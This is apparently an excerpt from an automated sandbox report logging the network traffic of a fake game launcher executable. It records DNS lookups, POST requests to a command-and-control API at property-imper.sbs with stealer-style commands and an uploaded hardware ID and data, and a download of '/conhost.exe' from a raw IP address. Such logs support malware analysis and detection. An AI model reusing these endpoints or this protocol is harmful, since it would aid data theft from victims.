                                                                                              Nov 23, 2024 15:06:18.463988066 CET44349738104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:18.465718985 CET4974080192.168.2.4147.45.47.81
                                                                                              Nov 23, 2024 15:06:18.585251093 CET8049740147.45.47.81192.168.2.4
                                                                                              Nov 23, 2024 15:06:18.585339069 CET4974080192.168.2.4147.45.47.81
                                                                                              Nov 23, 2024 15:06:18.585519075 CET4974080192.168.2.4147.45.47.81
                                                                                              Nov 23, 2024 15:06:18.705142021 CET8049740147.45.47.81192.168.2.4
                                                                                              Nov 23, 2024 15:06:40.569561958 CET8049740147.45.47.81192.168.2.4
                                                                                              Nov 23, 2024 15:06:40.569842100 CET4974080192.168.2.4147.45.47.81
                                                                                              Nov 23, 2024 15:06:40.570014954 CET4974080192.168.2.4147.45.47.81
                                                                                              Nov 23, 2024 15:06:40.689415932 CET8049740147.45.47.81192.168.2.4
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 23, 2024 15:05:58.017680883 CET6389653192.168.2.41.1.1.1
                                                                                              Nov 23, 2024 15:05:58.370604038 CET53638961.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Nov 23, 2024 15:05:58.017680883 CET192.168.2.41.1.1.10x84ffStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Nov 23, 2024 15:05:58.370604038 CET1.1.1.1192.168.2.40x84ffNo error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                              Nov 23, 2024 15:05:58.370604038 CET1.1.1.1192.168.2.40x84ffNo error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                              • property-imper.sbs
                                                                                              • 147.45.47.81
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449740147.45.47.81807328C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Nov 23, 2024 15:06:18.585519075 CET198OUTGET /conhost.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Host: 147.45.47.81


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449730104.21.33.1164437328C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-23 14:05:59 UTC265OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: property-imper.sbs
                                                                                              2024-11-23 14:05:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-11-23 14:06:00 UTC1018INHTTP/1.1 200 OK
                                                                                              Date: Sat, 23 Nov 2024 14:06:00 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=n5g4nuk5q2req9o5u0u24gsc9m; expires=Wed, 19-Mar-2025 07:52:39 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ydtRdOPnLb7yy0JIEfZNCl7Dp5a2Cj4Efk%2BpOJ%2BtZYdfQMiTWEgaLtvzjoYPp8nbImGA%2BE8UX%2BWffjubTI%2BLvE4juqshaoPpXWCBGWoOQjk%2BHhLbxUZA3PjaAQl0xxtjx1QE4A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8e71b7a2287c42fb-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=24650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=95431&cwnd=230&unsent_bytes=0&cid=a0256ab48dbdd573&ts=733&x=0"
                                                                                              2024-11-23 14:06:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-11-23 14:06:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449731104.21.33.1164437328C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-23 14:06:01 UTC266OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 51
                                                                                              Host: property-imper.sbs
                                                                                              2024-11-23 14:06:01 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@saschkaq&j=
                                                                                              2024-11-23 14:06:02 UTC1023INHTTP/1.1 200 OK
                                                                                              Date: Sat, 23 Nov 2024 14:06:02 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=8rk5eak196jq4f7ih1gldd8hvm; expires=Wed, 19-Mar-2025 07:52:41 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VhU%2FDtUX%2Bozv7GARnr%2FK7%2FqfqqXzeXgfbbQi1aeGvITQqCgR%2BSfmXuJ3yO3RVq0%2Ftf7xKMvEWY8UHtiufbXrZ8SFSDw%2BV64nE%2Fq2kGzeSml5scOJbrMnzc6aazn9AsKGPZWVSPQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8e71b7ae5b7c42f4-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1703&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=953&delivery_rate=1690793&cwnd=231&unsent_bytes=0&cid=ca2f199c971d6c4e&ts=717&x=0"
                                                                                              2024-11-23 14:06:02 UTC346INData Raw: 31 35 32 35 0d 0a 53 6d 63 39 59 2f 4f 48 35 32 4f 2f 65 4b 4e 34 68 72 71 78 39 4a 53 74 64 42 34 66 71 42 77 54 35 4f 4e 38 6e 4c 47 67 66 53 63 78 52 55 74 42 79 62 50 4c 51 63 77 64 67 55 4c 79 79 4d 53 52 75 49 38 56 65 6a 32 53 65 6e 4b 49 6b 42 6d 77 6b 39 59 51 42 58 41 42 58 41 2b 41 34 73 74 42 32 67 43 42 51 74 33 42 6b 35 48 36 6a 30 34 38 65 73 4a 2b 63 6f 69 42 48 66 66 65 30 42 46 45 49 67 74 61 43 35 62 6b 67 77 4c 54 46 63 59 64 34 39 76 62 6d 76 33 41 48 48 4d 39 68 44 35 32 6e 73 46 47 76 76 7a 46 43 55 59 48 42 6b 34 49 30 66 72 4c 47 4a 30 64 7a 56 71 38 6d 4e 43 52 39 73 45 53 65 6e 54 41 64 48 75 41 67 42 6a 32 77 63 6b 62 54 79 49 46 57 51 71 63 37 5a 63 50 32 52 4c 4e 47 2b 6e 62 6b 39 69 32 79 41 34 38 4a 59 6f 74 51 34 57 51 44
                                                                                              Data Ascii: 1525Smc9Y/OH52O/eKN4hrqx9JStdB4fqBwT5ON8nLGgfScxRUtBybPLQcwdgULyyMSRuI8Vej2SenKIkBmwk9YQBXABXA+A4stB2gCBQt3Bk5H6j048esJ+coiBHffe0BFEIgtaC5bkgwLTFcYd49vbmv3AHHM9hD52nsFGvvzFCUYHBk4I0frLGJ0dzVq8mNCR9sESenTAdHuAgBj2wckbTyIFWQqc7ZcP2RLNG+nbk9i2yA48JYotQ4WQD
                                                                                              2024-11-23 14:06:02 UTC1369INData Raw: 42 58 42 46 57 51 2b 51 36 49 55 54 31 52 48 4b 48 2f 62 54 32 70 76 37 7a 78 74 32 63 73 6c 2b 64 6f 79 4c 45 66 54 58 7a 78 4a 44 4b 41 55 66 54 39 48 69 6e 55 47 46 57 75 49 66 39 4e 2f 66 67 4c 54 31 56 6d 4d 7a 30 7a 35 32 69 73 46 47 76 74 76 48 48 45 59 6a 43 6c 77 4a 6d 76 65 46 45 39 73 58 78 41 6a 69 33 64 32 63 39 64 30 63 63 6e 76 4a 64 33 71 50 68 42 6e 36 6b 34 78 66 51 6a 42 46 42 30 47 77 36 49 34 4e 31 77 33 42 57 76 75 57 79 74 62 78 77 31 59 6b 50 63 35 2f 64 59 65 46 45 50 44 58 7a 68 6c 4c 4a 51 70 5a 43 35 48 69 6a 77 6e 56 47 38 77 52 36 39 6a 57 6d 2f 4c 4a 47 6e 31 34 69 6a 41 78 67 5a 6c 65 70 70 50 73 47 45 59 36 52 32 6f 43 6e 2b 75 43 46 35 30 46 6a 77 4f 6b 33 39 2f 57 72 6f 38 59 65 58 4c 59 66 32 4f 44 6a 77 7a 79 31 73 51
                                                                                              Data Ascii: BXBFWQ+Q6IUT1RHKH/bT2pv7zxt2csl+doyLEfTXzxJDKAUfT9HinUGFWuIf9N/fgLT1VmMz0z52isFGvtvHHEYjClwJmveFE9sXxAji3d2c9d0ccnvJd3qPhBn6k4xfQjBFB0Gw6I4N1w3BWvuWytbxw1YkPc5/dYeFEPDXzhlLJQpZC5HijwnVG8wR69jWm/LJGn14ijAxgZleppPsGEY6R2oCn+uCF50FjwOk39/Wro8YeXLYf2ODjwzy1sQ
                                                                                              2024-11-23 14:06:02 UTC1369INData Raw: 32 6f 43 6e 2b 75 43 46 35 30 46 6a 77 4f 6b 33 39 2f 57 72 6f 38 61 64 58 33 42 64 48 57 47 68 68 50 37 30 4d 55 63 53 43 38 50 55 51 61 56 36 59 77 4d 32 78 72 47 48 75 48 4b 31 70 2f 36 77 31 59 79 50 63 31 6d 4d 64 37 42 4d 66 6e 46 77 54 42 47 4f 51 77 66 48 74 2f 38 78 51 62 52 57 70 6c 61 34 39 33 62 6e 66 44 48 46 6d 35 34 78 48 56 77 6a 49 63 66 38 39 2f 45 48 30 51 6f 41 31 4d 42 6c 75 4b 58 45 39 67 63 30 78 43 6b 6c 70 4f 52 37 6f 39 4f 50 45 76 61 61 57 43 51 77 79 76 39 33 63 77 59 55 32 67 61 45 52 6a 52 34 6f 6c 42 68 56 72 4b 47 75 6a 66 32 35 44 79 78 78 6c 7a 64 4e 68 2f 66 59 69 54 47 66 37 61 7a 42 42 4a 49 51 68 59 44 4a 72 76 69 41 58 61 47 34 46 55 70 4e 2f 4c 31 71 36 50 49 47 78 77 78 6c 42 36 69 6f 68 65 34 5a 33 62 58 30 49 6b
                                                                                              Data Ascii: 2oCn+uCF50FjwOk39/Wro8adX3BdHWGhhP70MUcSC8PUQaV6YwM2xrGHuHK1p/6w1YyPc1mMd7BMfnFwTBGOQwfHt/8xQbRWpla493bnfDHFm54xHVwjIcf89/EH0QoA1MBluKXE9gc0xCklpOR7o9OPEvaaWCQwyv93cwYU2gaERjR4olBhVrKGujf25DyxxlzdNh/fYiTGf7azBBJIQhYDJrviAXaG4FUpN/L1q6PIGxwxlB6iohe4Z3bX0Ik
                                                                                              2024-11-23 14:06:02 UTC1369INData Raw: 6e 6b 69 77 37 63 48 73 51 66 34 4e 2f 58 6b 50 6d 50 57 44 78 36 30 6a 34 70 78 71 34 35 79 35 48 6a 4a 51 55 33 53 30 5a 42 6c 75 6e 46 57 5a 30 57 77 68 62 73 31 39 57 66 2b 73 55 66 64 33 48 42 65 6e 32 50 68 42 6a 2f 31 73 63 65 51 53 51 50 57 51 4b 53 36 6f 6f 4f 31 56 71 50 57 75 50 41 6b 38 36 32 36 67 46 33 63 38 77 2b 62 73 69 59 58 76 6e 66 67 6b 63 46 4a 41 78 5a 42 35 54 70 68 41 66 56 48 38 6b 65 35 64 37 56 6c 66 6e 4c 45 33 31 79 7a 6e 4a 2f 6a 49 41 66 38 74 6a 4e 46 45 42 6f 53 78 38 47 69 61 58 64 51 65 77 5a 31 77 33 30 31 4a 4f 4a 75 4e 5a 57 65 33 47 4b 4a 6a 47 48 6b 78 54 30 33 63 63 51 51 43 73 4b 57 41 79 58 36 59 38 49 31 52 7a 4f 45 2f 62 62 33 35 6a 78 77 52 70 79 63 4d 42 39 66 4d 62 50 58 76 6e 4c 67 6b 63 46 42 41 4a 53 4c
                                                                                              Data Ascii: nkiw7cHsQf4N/XkPmPWDx60j4pxq45y5HjJQU3S0ZBlunFWZ0Wwhbs19Wf+sUfd3HBen2PhBj/1sceQSQPWQKS6ooO1VqPWuPAk8626gF3c8w+bsiYXvnfgkcFJAxZB5TphAfVH8ke5d7VlfnLE31yznJ/jIAf8tjNFEBoSx8GiaXdQewZ1w301JOJuNZWe3GKJjGHkxT03ccQQCsKWAyX6Y8I1RzOE/bb35jxwRpycMB9fMbPXvnLgkcFBAJSL
                                                                                              2024-11-23 14:06:02 UTC968INData Raw: 54 32 41 6a 54 57 71 71 59 31 49 36 32 6c 31 5a 4b 65 74 70 75 63 73 53 77 43 50 33 46 79 52 4a 4a 61 42 6f 52 47 4e 48 69 69 55 47 46 57 73 63 56 37 64 76 63 6c 2f 2f 44 47 33 6c 30 7a 33 39 33 67 6f 73 55 2f 74 58 45 48 6b 41 69 42 6c 34 4c 6d 4f 4b 4e 42 74 34 49 67 56 53 6b 33 38 76 57 72 6f 38 2f 65 32 2f 45 62 6a 47 5a 7a 77 65 2b 31 4d 35 66 48 57 67 42 56 51 36 56 34 6f 6b 48 32 42 7a 4d 47 2b 76 5a 30 35 6e 79 78 42 39 36 66 4d 64 37 66 49 4b 54 46 50 58 63 7a 68 5a 4a 4a 55 55 52 51 5a 62 39 78 56 6d 64 4b 38 77 55 36 74 2f 46 31 75 6d 42 44 7a 78 36 78 6a 34 70 78 6f 41 53 38 64 44 4e 48 45 59 70 44 30 30 54 6e 65 79 4e 42 4e 45 52 7a 78 7a 32 33 74 79 66 39 63 77 66 65 33 58 47 64 48 4b 42 77 56 43 2b 31 4e 70 66 48 57 67 6d 53 42 47 63 70 5a
                                                                                              Data Ascii: T2AjTWqqY1I62l1ZKetpucsSwCP3FyRJJaBoRGNHiiUGFWscV7dvcl//DG3l0z393gosU/tXEHkAiBl4LmOKNBt4IgVSk38vWro8/e2/EbjGZzwe+1M5fHWgBVQ6V4okH2BzMG+vZ05nyxB96fMd7fIKTFPXczhZJJUURQZb9xVmdK8wU6t/F1umBDzx6xj4pxoAS8dDNHEYpD00TneyNBNERzxz23tyf9cwfe3XGdHKBwVC+1NpfHWgmSBGcpZ
                                                                                              2024-11-23 14:06:02 UTC1369INData Raw: 32 66 34 37 0d 0a 64 37 42 48 30 41 36 42 45 30 4f 6d 75 43 47 42 64 49 56 7a 52 4c 75 6d 4a 33 57 38 64 64 57 4a 44 33 6d 66 57 43 4d 77 7a 6e 6b 78 63 55 54 56 43 4d 49 55 30 47 4f 71 35 78 42 32 68 61 42 51 71 54 59 30 70 76 6b 79 68 64 32 64 38 64 32 66 6f 4f 45 45 66 72 58 79 52 46 58 4a 67 70 66 42 35 72 6b 67 41 4c 57 45 4d 38 54 39 70 69 64 31 76 48 58 56 69 51 39 34 47 56 77 69 34 31 63 30 4e 6a 55 47 41 63 4a 43 31 51 47 6e 66 50 46 48 70 4d 44 67 52 33 6f 6d 49 76 57 2f 38 45 61 66 33 72 43 64 6e 53 47 69 68 37 78 32 63 77 59 56 79 49 4a 56 52 4f 65 35 6f 67 46 30 42 44 45 45 2f 62 64 32 70 43 32 67 56 5a 37 5a 59 6f 6d 4d 62 36 4b 45 4d 7a 51 32 56 39 61 5a 68 77 66 42 70 32 6c 33 55 48 65 48 63 49 62 37 74 48 66 6d 66 48 4c 42 48 5a 36 32 48
                                                                                              Data Ascii: 2f47d7BH0A6BE0OmuCGBdIVzRLumJ3W8ddWJD3mfWCMwznkxcUTVCMIU0GOq5xB2haBQqTY0pvkyhd2d8d2foOEEfrXyRFXJgpfB5rkgALWEM8T9pid1vHXViQ94GVwi41c0NjUGAcJC1QGnfPFHpMDgR3omIvW/8Eaf3rCdnSGih7x2cwYVyIJVROe5ogF0BDEE/bd2pC2gVZ7ZYomMb6KEMzQ2V9aZhwfBp2l3UHeHcIb7tHfmfHLBHZ62H
                                                                                              2024-11-23 14:06:02 UTC1369INData Raw: 4c 50 54 51 7a 67 6c 49 4a 30 56 41 54 34 69 6c 67 67 32 64 51 6f 45 49 39 74 6a 59 6c 76 48 42 42 48 31 31 78 58 52 78 67 49 6f 55 2f 64 72 47 45 55 77 75 42 46 49 41 6b 4f 57 41 41 64 51 49 7a 46 71 71 6d 4e 53 4f 74 70 64 57 53 33 48 42 54 33 4b 51 77 51 47 77 79 6f 49 59 53 57 68 64 48 77 43 44 36 49 30 46 33 52 66 48 45 65 58 5a 30 4a 62 32 7a 42 5a 35 64 73 56 34 64 6f 75 4c 46 2f 66 42 79 68 74 58 4b 41 6c 62 51 64 2b 6c 67 68 6d 64 51 6f 45 71 35 39 50 66 6c 76 76 61 56 6d 4d 7a 30 7a 35 32 69 73 46 47 76 74 76 4a 46 45 4d 6a 42 6c 77 50 6d 75 2b 4b 44 74 63 63 78 78 4c 68 32 4e 2b 57 38 38 6b 53 65 48 50 4e 63 48 79 48 6b 78 33 33 6b 34 78 66 51 6a 42 46 42 30 47 78 37 70 4d 45 32 67 79 44 4c 2b 66 57 33 5a 48 67 6a 77 6c 44 4d 34 70 78 61 38 62
                                                                                              Data Ascii: LPTQzglIJ0VAT4ilgg2dQoEI9tjYlvHBBH11xXRxgIoU/drGEUwuBFIAkOWAAdQIzFqqmNSOtpdWS3HBT3KQwQGwyoIYSWhdHwCD6I0F3RfHEeXZ0Jb2zBZ5dsV4douLF/fByhtXKAlbQd+lghmdQoEq59PflvvaVmMz0z52isFGvtvJFEMjBlwPmu+KDtccxxLh2N+W88kSeHPNcHyHkx33k4xfQjBFB0Gx7pME2gyDL+fW3ZHgjwlDM4pxa8b
                                                                                              2024-11-23 14:06:02 UTC1369INData Raw: 63 51 63 55 79 74 43 59 54 2b 78 37 6f 6b 43 30 52 76 47 57 71 71 59 33 4e 61 75 39 6c 5a 2f 62 39 67 78 59 4a 43 4d 44 76 6d 66 79 67 35 49 4a 45 55 52 51 64 33 68 6a 67 33 59 48 64 46 56 39 73 6a 59 6d 75 43 44 45 6d 34 39 68 44 35 67 6a 59 34 4d 38 4e 53 4e 44 6c 4d 6c 46 56 77 45 6c 71 6d 4e 45 4e 41 57 67 56 53 6b 7a 64 69 61 38 4d 49 44 4d 32 7a 63 66 57 65 42 7a 52 62 76 33 73 35 66 65 6d 5a 46 52 30 48 4a 70 62 41 43 30 78 54 47 44 50 57 56 38 35 33 36 7a 42 70 39 65 6f 6f 77 4d 59 44 42 52 71 32 64 67 68 74 55 61 46 30 50 55 38 71 77 31 6c 61 4e 53 4e 35 55 2f 5a 6a 46 31 71 36 64 57 44 78 76 69 69 59 78 77 59 49 4d 37 4e 58 42 43 55 5a 76 4f 32 45 41 6e 4f 72 4a 44 39 59 61 78 67 72 79 77 35 2b 65 39 64 55 4d 51 6b 50 68 63 6e 65 42 6d 78 6e 34
                                                                                              Data Ascii: cQcUytCYT+x7okC0RvGWqqY3Nau9lZ/b9gxYJCMDvmfyg5IJEURQd3hjg3YHdFV9sjYmuCDEm49hD5gjY4M8NSNDlMlFVwElqmNENAWgVSkzdia8MIDM2zcfWeBzRbv3s5femZFR0HJpbAC0xTGDPWV8536zBp9eoowMYDBRq2dghtUaF0PU8qw1laNSN5U/ZjF1q6dWDxviiYxwYIM7NXBCUZvO2EAnOrJD9Yaxgryw5+e9dUMQkPhcneBmxn4
                                                                                              2024-11-23 14:06:02 UTC1369INData Raw: 59 2b 42 68 39 50 30 66 33 46 57 5a 30 37 79 77 72 70 31 39 54 57 75 49 38 53 50 43 57 4b 57 33 79 4c 68 42 44 35 6b 65 4d 56 56 53 55 4b 57 45 48 66 70 59 6c 42 68 56 72 41 45 50 54 56 33 4a 47 36 79 41 78 37 50 59 51 2b 66 38 62 5a 58 76 2f 5a 30 68 4a 4b 4c 30 6c 5a 44 35 2b 6c 6d 6b 2f 45 57 74 64 61 76 49 75 64 31 75 53 50 54 6a 77 36 78 48 4e 77 68 59 38 64 37 4d 48 45 48 46 4d 72 51 6d 45 2f 74 4f 69 49 42 4e 4d 64 2f 79 54 46 30 73 4f 62 2b 63 68 55 58 48 72 63 66 55 2b 34 74 67 2f 35 77 34 41 35 52 6a 34 47 48 30 2f 52 2f 63 56 5a 6e 54 76 4c 43 75 6e 58 31 4e 54 57 79 41 42 2f 50 59 51 2b 64 63 62 5a 58 74 76 65 7a 78 70 4c 4c 30 64 2b 43 34 48 6f 69 67 61 66 4f 73 59 4d 35 35 69 64 31 76 71 50 54 6a 78 38 77 47 35 38 69 59 5a 53 2b 63 6e 46 58
                                                                                              Data Ascii: Y+Bh9P0f3FWZ07ywrp19TWuI8SPCWKW3yLhBD5keMVVSUKWEHfpYlBhVrAEPTV3JG6yAx7PYQ+f8bZXv/Z0hJKL0lZD5+lmk/EWtdavIud1uSPTjw6xHNwhY8d7MHEHFMrQmE/tOiIBNMd/yTF0sOb+chUXHrcfU+4tg/5w4A5Rj4GH0/R/cVZnTvLCunX1NTWyAB/PYQ+dcbZXtvezxpLL0d+C4HoigafOsYM55id1vqPTjx8wG58iYZS+cnFX


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449732104.21.33.1164437328C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-23 14:06:04 UTC285OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=8J0IL4TVRGUJQMNBHV3
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 18173
                                                                                              Host: property-imper.sbs
                                                                                              2024-11-23 14:06:04 UTC15331OUTData Raw: 2d 2d 38 4a 30 49 4c 34 54 56 52 47 55 4a 51 4d 4e 42 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 38 4a 30 49 4c 34 54 56 52 47 55 4a 51 4d 4e 42 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 4a 30 49 4c 34 54 56 52 47 55 4a 51 4d 4e 42 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73
                                                                                              Data Ascii: --8J0IL4TVRGUJQMNBHV3Content-Disposition: form-data; name="hwid"8DA078FD107AA3B7C3D9BBD8FB1FB453--8J0IL4TVRGUJQMNBHV3Content-Disposition: form-data; name="pid"2--8J0IL4TVRGUJQMNBHV3Content-Disposition: form-data; name="lid"BVnUqo--@s
                                                                                              2024-11-23 14:06:04 UTC2842OUTData Raw: b6 ae 65 d3 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa
                                                                                              Data Ascii: e,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)
                                                                                              2024-11-23 14:06:05 UTC1019INHTTP/1.1 200 OK
                                                                                              Date: Sat, 23 Nov 2024 14:06:04 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=6qi3nhivjf1h465uuieq0igs3d; expires=Wed, 19-Mar-2025 07:52:43 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ySKgqg1pnfO1eIovEvx4dTPcG1BMwt2YPl%2FYWYkPJQK5SQpOihb8BRu6bVdEUAcwUaul7dK%2BZBleK5PnYrmIimUAPPSdO3D%2BoDouTbIHie4XkH8hnoXtSaXksDD%2FkYoLojPCggY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8e71b7bdcbae41a1-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2050&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19138&delivery_rate=1377358&cwnd=224&unsent_bytes=0&cid=4635f15ba6c0cbff&ts=818&x=0"
                                                                                              2024-11-23 14:06:05 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                              Data Ascii: eok 8.46.123.75
                                                                                              2024-11-23 14:06:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449733104.21.33.1164437328C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-23 14:06:06 UTC277OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=3JDFRV3OG3YA
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8752
                                                                                              Host: property-imper.sbs
